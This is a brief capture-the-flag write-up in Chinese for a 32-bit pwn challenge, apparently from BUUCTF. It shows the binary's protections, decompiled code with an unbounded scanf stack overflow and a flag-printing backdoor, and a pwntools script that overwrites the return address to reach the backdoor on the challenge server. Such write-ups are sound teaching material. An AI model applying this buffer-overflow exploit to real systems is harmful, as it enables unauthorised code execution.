bbys_tu_2016
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
32位,只开了NX
int __cdecl main(int argc, const char **argv, const char **envp)
{
int v4; // [esp+14h] [ebp-Ch] BYREF
puts("This program is hungry. You should feed it.");
__isoc99_scanf("%s", &v4);
puts("Do you feel the flow?");
return 0;
}
栈溢出
int printFlag()
{
char s[50]; // [esp+1Ah] [ebp-3Eh] BYREF
FILE *stream; // [esp+4Ch] [ebp-Ch]
stream = fopen("flag.txt", "r");
fgets(s, 50, stream);
puts(s);
fflush(stdout);
return fclose(stream);
}
有后门
思路
栈溢出到后门getshell
实际上在调试的时候发现不是ida的0xc,而是0x14
from pwn import*
from Yapack import *
r,elf=rec("node4.buuoj.cn",28559,"./pwn",0)
context(os='linux', arch='amd64',log_level='debug')
pl=cyclic(0x18)+p32(0x804856D)
sl(pl)
ia()